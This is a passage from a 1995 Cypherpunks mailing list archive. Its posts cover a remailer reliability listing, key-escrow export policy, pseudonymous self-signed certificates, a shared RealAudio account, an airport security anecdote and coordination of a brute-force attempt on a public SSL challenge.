various security programs regularly. This was part of a
routine check of their own security systems.

"The bag got away from them basically," he said.

-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 20 Aug 95 19:28:21 PDT
To: cypherpunks@toad.com
Subject: Re: Basically F-C-ed
Message-ID: <199508210228.AA19298@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous sez:

: FBI Probing Planted Explosive


: Orlando, Fla., August 20 (AP) -- Two explosives were
: planted in a professor's suitcase to test airport
: security measures in Amsterdam, The Netherlands, and were
: discovered when he arrived in Orlando, officials said
: Saturday.

[..]
: Kensel said such security measures were normal for
: Europe.

: "Particularly in Europe, there are grave concerns about
: security issues," he said. "As a result, they do conduct
: various security programs regularly. This was part of a
: routine check of their own security systems.

: "The bag got away from them basically," he said.


Airport police was very quick to point out that such practices
were legal, now when they do that ......

--
Alex de Joode
Fear Uncertainty Confusion and Kaos, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 21 Aug 95 06:51:22 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199508211350.GAA04171@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 21 Aug 95 6:00:07 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
spook    remailer@spook.alias.net         +-------+--+  2:37:07  99.99%
portal   hfinney@shell.portal.com         #.-*#***##*#    20:53  99.99%
replay   remailer@replay.com              *****++**+**    11:22  99.99%
alumni   hal@alumni.caltech.edu           *.-*#*******    26:11  99.99%
crown    mixmaster@kether.alias.net       ------------  2:20:01  99.99%
hacktic  remailer@utopia.hacktic.nl       *****++**+**    12:14  99.99%
hroller  hroller@c2.org                   -##*-***##**    11:48  99.93%
syrinx   syrinx@c2.org                    -----------   2:02:23  99.92%
mix      mixmaster@remail.obscura.com     -++------..   9:59:29  99.91%
c2       remail@c2.org                    -++++++++++     47:13  99.90%
flame    remailer@flame.alias.net         ++++++++++++    55:03  99.83%
ideath   remailer@ideath.goldenbear.com   -.-..----.-   5:50:27  99.75%
vox      remail@vox.xs4all.nl             .---------   12:10:38  99.99%
ford     remailer@bi-node.zerberus.de     **#***-****#     5:54  99.42%
bsu-cs   nowhere@bsu-cs.bsu.edu           ###*#_.-##+#  3:53:51  99.20%
vishnu   mixmaster@vishnu.alias.net       -- --- ----   3:01:49  99.07%
gondolin mixmaster@gondolin.org           *--*-* **+      31:07  98.87%
rmadillo remailer@armadillo.com           **__.++++++*  3:57:22  98.33%
extropia remail@extropia.wimsey.com       .   .--._.-  16:59:51  95.74%
penet    anon@anon.penet.fi               +++*---- -++  4:27:59  90.66%
rahul    homer@rahul.net                  ##**#***#*+#     6:58  99.99%
rebma    remailer@rebma.mn.org            -             9:53:43  10.67%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 20 Aug 95 22:40:19 PDT
To: cypherpunks@toad.com
Subject: Re: RealAudio website temporary passwordRe: RealAudio website temporary password
Message-ID: <199508210540.HAA04886@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


The Cypherpunks RealAudio free account is now activated with password
"writecode" (case sensitive -- make them letters small).

The user name is still "cypherpu".  RealAudio.com does not truncate names
longer than 8 characters during login (meaning "cypherpunks" fails), but
their signup page won't allow entry of more than 8.  Silly.

Don't have too much fun listening to NPR, now...


> Date: Sun, 20 Aug 1995 21:49:23 -0700
> From: RealAudio Welcome Wagon <welcome@realaudio.com>
> To: cypherpunks@toad.com
> Reply-To: welcome@realaudio.com
> Subject: RealAudio website temporary password
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
>
> This is an automatic response to your request for a free user account
> on the RealAudio site. Welcome to the world of RealAudio.
>
> The following temporary password will only be used once,
> in order to activate the username and password you
> selected for yourself during signup.
> To activate your account, please visit our Account Activation page
> at http://www.RealAudio.com/welcome.html
> and enter the temporary password in the proper blank.
>
> The user name you selected is:
>
> cypherpu
>
> Your temporary RealAudio password is:
>
> Toledo.Francisco
>
> If you have trouble with the software, please refer to
>  the RealAudio FAQ and Technical Notes available at
>  http://www.RealAudio.com/help.html
>
> You can also contact us through http://www.RealAudio.com/comment.html
>
> Thank you for becoming a RealAudio user.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 21 Aug 95 04:53:31 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
Message-ID: <v02120d02ac5e1e6c3b53@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:41 PM 8/20/95, Timothy C. May wrote:
>And it is, as those cases were, but predicting the imminent
>collapse of American civilization is usually a lose.

One of my favorite quotes is supposed to be from Gibbon's _Decline and Fall
of the Roman Empire_ .  If I write a book about this stuff, it'll go right
on the frontispiece. Something like:

"It is quite attractive to posit the end of the world in one's analysis of
current affairs, but historically, it hasn't proven to be correct."

BTW, I've been looking for the exact quote for about 6 months, without
having reread the whole damn book.  If anyone who has actually *seen* an
on-line copy of Gibbon would send me pointer to it, I would be much
obliged. I have looked in all the usual places (Gutenberg, etc.) to no
avail...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 20 Aug 95 23:00:15 PDT
To: cypherpunks@toad.com
Subject: Re: RealAudio website temporary passwordRe: RealAudio website temporary password
Message-ID: <199508210600.IAA05113@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
>>This is an automatic response to your request for a free user account
>>on the RealAudio site. Welcome to the world of RealAudio.
>> ...
>>The user name you selected is:
>>
>>cypherpu
>
>The password has been changed to "cypherpunks"
>

Oops.  Thank you for changing the password.  Shall we not use writecode
unless the site does not allow "cypherpunks" as the password?  I get it
now.

Crypto relevance:

    http://www.realaudio.com/rafiles/npr/password/nb081801-4.ram

The segment is overly optimistically billed as:

"Dan Charles reports the Clinton administration has reached a compromise
with the security
industry about the export of encryption equipment that will protect
personal computer files
and allow law enforcement agencies access to them if necessary. (3:30)"








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyle Seaman <lws+@transarc.com>
Date: Mon, 21 Aug 95 07:04:41 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
In-Reply-To: <ac5d49b804021004ff37@[205.199.118.202]>
Message-ID: <8kC8vdaSMUw8I0axsN@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> The U.S. is not likely to find itself relegated to third world status over
> this issue. Rhetorically, I wish it were so, but it just ain't. This
> issue--like the McCarthy hearings in the 1950s, the race issue in the '60s,
> the Vietnam war in the '60s and '70s, to name a few cases, _sounds_ really
> serious. And it is, as those cases were, but predicting the imminent
> collapse of American civilization is usually a lose.

In all those cases, the critics were right.  You just think "imminent"
means "in the next year or two".  Look at at the signs, man --
literacy and child mortality rates, an imprisoned populace, massive 
government debt, etc.  The US is slipping into the second world as we
speak, with no signs of a turnaround ahead.  Only the sheer size of
the economy keeps people from believing it.  The critics _were_ right.
(Incidentally, the race issue certainly spans more than a mere
decade. The race-related violent demonstrations certainly peaked in
the 60s, but the deleterious effects of forced immigration and slavery
have been a blight on society every day for almost three centuries.) 

Go right ahead, fed, ban strong crypto.  The coffin only needs a few
more nails.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 21 Aug 95 07:13:23 PDT
To: rsalz@osf.org
Subject: Re: Export policy change
In-Reply-To: <199508181846.LAA12609@comsec.com>
Message-ID: <9508211409.AA26815@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: Rich Salz <rsalz@osf.org>
>Date: Thu, 17 Aug 1995 23:48:01 -0400

>The
>reporter (Dan Charles?) said something like anyone can hold the keys,
>as long as they will be made avail when presented with a court order.
>He also said, US citizens will still be able to use strong crypto
>without key escrow internally.

The real question is whether manufacturers will bother producing multiple
versions -- one domestic, one foreign.

There's room for cypherpunks yet -- not only writing crypto applications
but also generating emergency-access systems (e.g., for PGP) which meet our
needs.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 21 Aug 95 07:13:21 PDT
To: Marcel van der Peijl <bigmac@digicash.com>
Subject: Re: Basically F-C-ed
In-Reply-To: <199508210927.LAA20988@digicash.com>
Message-ID: <199508211411.KAA02016@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm not sure this has much to do with crypto any more...

.pm

Marcel van der Peijl writes:
> My $0.02 on the 'strict security' on Schiphol (first one to cash in 
> gets it) based upon personal experience:
> 
> American airlines (Northwest, United) have very strict security when 
> departing from Schiphol. Interviews, men with rifles, queries on who 
> packed your luggae, etc. But all the crap I drag around (200+ kilo's of 
> exhibition equipment full of custom built hardware, large batteries, 
> transformers etc) has never been opened.
> 
> However, you should try flying a different airline: KLM, Lufthansa, etc.
> No interviews, no guns, just friendly people.
> 
> // Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
> // The hottest instruction on a P90? JMP $ @ 2.633A or 52C (with fan)
> 
> -----BEGIN ECASH PAYMENT-----
> 
> oLmQgwABBKGgiqCukIEOkIECkIECkIEBkIEBkYQwOFBMkIQwSsVMkIEOkoFAlJS9
> 6s3VPOknMsxX6gckPyMn5pTcxZSUvidM8tDgBQYJ1/mvUX0btKmF3yuQgRCSik15
> IDIgY2VudHOSgJSAkIIB4pGEAAAAAJCBAKGguKCrkIIBIZPAJ83XcZEK8+t+LfQy
> EXr67l4ronGhdnuPNhuW8cBkDuHcFSX1zLMJasUaMmul7wA79+myPl1/HBRHSdku
> xEgBBpPAU6yZn9wp1lyDpRVcGh7Hkez5HMwItWcVXKcu9EDLauSMx5yvb5XKb3R6
> 7vPD6IwSY9nXc9bLRm+PAdZatnDwBJCBAqGhoQ==
> -----END ECASH PAYMENT-----
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 21 Aug 95 07:22:30 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <9508211422.AA13099@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> We all read the stories. "Infant stolen from crib in Hospital", "Thousands
> of children abducted every year". Many parents would jump at the anything
> that might increase the chance of recovering their children should they be
> abducted. Just take a look at lines during "Child Fingerprint Days" at you
> local mall.
> The transpoders also provide ID for the ATMs and credit card termials of
> the future. No criminal can loot your account. You can leave the ATM card
> at home. How convenient! 

    This is one place where the nutty end of the religious right can 
actually help preserve liberties - the proposal is so close the the 
'mark of the Beast'  in Revelations that they can be counted on to oppose
it to their dying breaths.



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 21 Aug 95 07:49:15 PDT
To: mfroomki@umiami.ir.miami.edu
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <199508182054.NAA16103@comsec.com>
Message-ID: <9508211437.AA29550@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 18 Aug 1995 14:47:55 -0400 (EDT)
>From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>

>You have decided to allow the private CAs to issue certificates of varying
>degrees of corroberation so long as the degree of verification used is
>deducible from the certificate.  E.g. a certificate might say "we check
>the passport"; or "we check driver's license" or "we took blood, hair,
>fingprint, retinal scan and first-born child".  It might even say "we
>checked nothing".  You have also decided that a CA may issue a certificate
>in the name of a pseudonym, so long as the CA retains information about
>the True Name.  Now the issue arises as to whether one should allow the CA
>to issue certificates to pseudonyms where it has *no record* of the real
>identity of the person proffering the key pair. 
>
>Is there any reason why a person would want such a certificate?  

I see several reasons, but I don't see a reason for a CA in this case.  The
key being signed can serve in place of the CA's key.  That is, the key can
be self-signed.  All that needs to be proved in this case is that someone
owns the private key which goes with the public key.

As for what good that key is --

Prior to our meeting in person this year, all you knew about me was by my
postings.  If I had signed all of them with the same self-signed key, then
you would know that all of those postings came from one "person" (the set
of people, presumably only one person, with access to the private key).
The postings define the person, in your mind, and you are absolutely
certain that they came from that person (defined as I did above).  You
don't need any further certification to attest to that fact.

No economic impact, you say?

My postings could have been S/W.  You could have tried my S/W and liked it
-- hiring me to do work for you privately.  In all this process, we need
never meet.  If we don't meet, it doesn't matter what my blood type is or
if I have a driver's license or a passport.  I could even be a small,
silver-skinned alien who is perpetually in hiding.

No money transfer, you say?

Wells Fargo bank (an innovator) could initiate public-key bank accounts.  I
would open the account by sending them a self-signed public key.  They
would use that key as my bank account number.  Anyone would be allowed to
deposit money into that account (e.g., using CyberCash transfers).  Only I,
the person holding the private key, would be permitted to transfer funds
out.

Again, in the Internet, nobody knows you're a dog-faced alien sea creature.

 - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 21 Aug 95 11:19:02 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Santa Cruz meeting/party, Saturday, 26 August
Message-ID: <ac5e0f44040210042333@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



This is the last announcement I'll make here on the general Cypherpunks
list for this meeting/party at my house. I keep a mailing list for
interested folks, with about 35-40 names on it (not all of them local to
Santa Cruz and Monterey, needless to say). To be added, send me mail...no
special format, as I keep the list manually in Eudora Pro.

Here are just a few details.

WHAT: Cypherpunks Santa Cruz meeting/party. A chance for locals to meet,
and for others who want to vary their routine to visit this area.

WHEN: Saturday, August 26th, 1995, beginning at around 6 p.m., but early
arrivers can arrive as early as 5 (some are travelling from afar, so...).
Several people plan to stay over until Sunday.

WHERE: Tim May's house in Corralitos, between Aptos and Watsonville. 427
Allan Lane, 408-728-0152. Detailed directions available from the full
announcement.

WHO: Anybody who wants to attend. It will be both a meeting and a party, so
children and SOs may find it boring--you have been warned. Some local
people interested in crypto or related issues are on this list, even if
they're not subscribers to the Cypherpunks main list.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Mon, 21 Aug 95 11:09:35 PDT
To: "cypherpunks@toad.com>
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508211807.LAA01619@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

James and cpunx,

>At 11:45 AM 8/19/95 -0400, John Young wrote:
>>Fourth Foresight Conference on Molecular Nanotechnology
>And what does this have to do with cryptography?

Doesn't quantum coherence require molecular precision if it
is to work on 1024 bit PGP keys? If it works, such keys can 
be instantly factorized. It would be nice to follow that progress.

If human engineered molecular nano works, we'll have much 
more than PGP to worry about. Copies of copies of 
replicating disassemblers could rip the Earth apart in three
days, assuming doubling every 20 minutes like bacteria,
but not limited to proteins.

That would have a big impact on digital cash networks!

Kent
--
"Put pages for your business on the World Wide Web, just $5 per month!"
J. Kent Hastings -- zeus@pinsight.com -- http://www.pinsight.com/~zeus/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Mon, 21 Aug 95 08:23:36 PDT
To: aba@exe.ex.ac.uk
Subject: Re: NEXT CHALLENGE...
In-Reply-To: <9508211354.AA12454@toad.com>
Message-ID: <199508211516.LAA08870@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon Aug 21 09:26:50 1995: you scribbled...
> 
> -------------------------------------8<-------------------------------------
> # SSLbrute 1.0 parameter file for Hal Finney's 2nd SSL challenge as 
> # posted to Cypherpunks on 19 August 1995. 
> #
> # file checksum (ignoring # comments and whitespace) is 2977
> 
> CLEAR-MASTER     fbc009916010a6153f8f36
> CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6
> CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4
> SERVER-VERIFY    006599b6d2f2a736
> -------------------------------------8<-------------------------------------

I've checked these numbers and I got the same answers.

Anyone who feels up to it can check the page

	http://petrified.cic.net/~altitude/ssl/ssl.challenge.2.long

> The keyserver will not be doling yet but please pickup the software
> ready to start.

Just a question, what's the purpose of this challenge?  If it's to do it
as fast as we can, then what about the person who already posted to the 
list saying that they were starting (with keys a000 -> afff).  

...alex...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcel van der Peijl <bigmac@digicash.com>
Date: Mon, 21 Aug 95 02:27:52 PDT
To: cypherpunks@toad.com
Subject: Re: Basically F-C-ed
In-Reply-To: <199508210220.EAA03190@utopia.hacktic.nl>
Message-ID: <199508210927.LAA20988@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


My $0.02 on the 'strict security' on Schiphol (first one to cash in 
gets it) based upon personal experience:

American airlines (Northwest, United) have very strict security when 
departing from Schiphol. Interviews, men with rifles, queries on who 
packed your luggae, etc. But all the crap I drag around (200+ kilo's of 
exhibition equipment full of custom built hardware, large batteries, 
transformers etc) has never been opened.

However, you should try flying a different airline: KLM, Lufthansa, etc.
No interviews, no guns, just friendly people.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// The hottest instruction on a P90? JMP $ @ 2.633A or 52C (with fan)

-----BEGIN ECASH PAYMENT-----

oLmQgwABBKGgiqCukIEOkIECkIECkIEBkIEBkYQwOFBMkIQwSsVMkIEOkoFAlJS9
6s3VPOknMsxX6gckPyMn5pTcxZSUvidM8tDgBQYJ1/mvUX0btKmF3yuQgRCSik15
IDIgY2VudHOSgJSAkIIB4pGEAAAAAJCBAKGguKCrkIIBIZPAJ83XcZEK8+t+LfQy
EXr67l4ronGhdnuPNhuW8cBkDuHcFSX1zLMJasUaMmul7wA79+myPl1/HBRHSdku
xEgBBpPAU6yZn9wp1lyDpRVcGh7Hkez5HMwItWcVXKcu9EDLauSMx5yvb5XKb3R6
7vPD6IwSY9nXc9bLRm+PAdZatnDwBJCBAqGhoQ==
-----END ECASH PAYMENT-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sun, 20 Aug 95 19:31:56 PDT
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: NSA into antigravity?
In-Reply-To: <v01510101ac5d1e46d09f@[193.74.217.8]>
Message-ID: <199508210055.AA27598@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>>>Neither the University nor the NSA has commented on the incident. However,
>>>it is believed that Ollman and Wayne were investigating a slight anomaly
>>>in the Earth's gravitational field centered around Fort Meade. No reason has
>>>been given for their detention.

The anomaly is just the NSA basements full of buzzing machines emitting all
that RFI and putting the Earth off tilt by .004 degrees a year. The nukes
actually home in on the emitted radiation like a heat seeking missile.

:)
Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 21 Aug 95 09:31:07 PDT
To: cypherpunks@toad.com
Subject: ENE_mah
Message-ID: <199508211622.MAA03823@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-21-95. NYPaper:


   "C.I.A. Re-examines Hiring Of Ex-Terrorist as Agent: Agency
   Has Misgivings About Some on Payroll."

      As the Central Intelligence Agency cleans house after
      the cold war, trimming its roster of foreign agents and
      writing new rules for hiring them, a retired terrorist
      who was until recently on the agency's payroll has given
      it cause for some soul-searching. The case is a classic
      example of the dilemma the C.I.A. continually faces in
      recruiting foreign agents. The intelligence agency
      struggles to balance the demand to obtain information
      with its desire to keep its own hands clean, though it
      frames the issue in terms of national security, not
      morality. The C.I.A. will draw on the experience of the
      Federal Bureau of Investigation and the Drug Enforcement
      Administration in dealing with informants in the future. 
That
      is a break from the past; the agency has long considered
      law enforcement procedures an enema.


   ENE_mah











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 21 Aug 95 09:56:20 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
Message-ID: <9508211648.AA17528@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> The US is slipping into the second world as we
> speak, with no signs of a turnaround ahead.  Only the sheer size of
> the economy keeps people from believing it. 

Just a nomenclature peeve - I'm not sure of the precise time and 
place the (first|second|third) world meme originated, but it seems to
predate 1970, and until very recently it's meaning was clear:

First world: Western (and Westernized) nations - mainly the US, Canada, Western Europe, 
Japan, Australia, & New Zealand

Second world: Communist bloc (I can still remember the Cultural 
Revolution. Prior to that, the Communists seemed a monolithic force, 
marching in lockstep.)

Third world: The rest, mostly poor nations. 

Back then, the world was a simpler place. 


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 21 Aug 95 11:56:39 PDT
To: Carl Ellison <cme@tis.com>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <9508211437.AA29550@tis.com>
Message-ID: <199508211856.MAA08294@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> As for what good that key is --

<snip>

> No economic impact, you say?

<snip>

> No money transfer, you say?

<snip>

> Again, in the Internet, nobody knows you're a dog-faced alien sea creature.


Thank you for posting that.  I've been increasingly frustrated with people
who assume that they have some need for a one-to-one 
'nym<->Real-Life-human-body mapping.  I would have been posting on this
topic myself, but I am busy.


Thanks again, and I hope you go ahead and start PGP-clearsigning your posts
so that my high opinion of you can become more firmly fixed.


:-)


Regards,

Bryce

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDjWw/WZSllhfG25AQFK/AQArnre8FU4fs/w93xHy7MgE0pjbHpSrvmw
U2flrQcbr+erwgzzNaFjgM5th2vScgTmLXWkg4IAmLpUM7pz4aVZM/5mj9Pg6T8J
fQS1DK7Lt6oAEqzqWjW/7xM1dxIyZkwyjJmO45TnqbBFjUjguqZ39QDacDhywhgr
uCErN4fwQ1o=
=096y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iagoldbe@calum.csclub.uwaterloo.ca>
Date: Mon, 21 Aug 95 11:19:20 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: NEXT CHALLENGE: plan of action?
In-Reply-To: <25403.9508211621@exe.dcs.exeter.ac.uk>
Message-ID: <199508211751.NAA17649@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


> I read on Saturday Ian Goldbergs post about starting out on the
> challenge using Damiens code.
> 
> It doesn't matter a great deal which code is used as such, but the
> main thing is to ensure that this is a coordinated effort.  The aim of
> the challenge (which I requested and Hal kindly provided just before
> popping off for a week or so's holiday) was to see how fast a SSL
> challenge could be broken.  Not how *soon*, note the distinction.
> 
> That means that if for instance we count the time that Ian has been
> clocking up since Saturday, the real time will be slowed by approx 2
> days.  We really need to do this with a starting-line like affair, so
> that someone is running a server, and everyone gets the code compiled
> etc, and then the server starts offering the challenge and all the
> clients fire off.
> 
> That way we have a less straggly start up which makes for better
> bruteing figures.
> 
> Agreed so far?

Sorry I missed the fast/soon distinction.  I've stopped the search after
searching keys starting with 0xaf down to 0xa5, and will join the group
search after I get settled in after moving to Berkeley tomorrow.  I
encourage the people who pointed their clients at me (thanks!) to stop
them, and to join the group.

In the interests of not adding a few days to the time, we should ignore
the fact that a bit of the keyspace has already been searched, and
start again.

   - Ian "On your marks, get set, ..."



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 20 Aug 95 21:05:46 PDT
To: mfroomki@umiami.ir.miami.edu (Michael Froomkin)
Subject: Re: Certificates/Anonymity/Policy/True Names
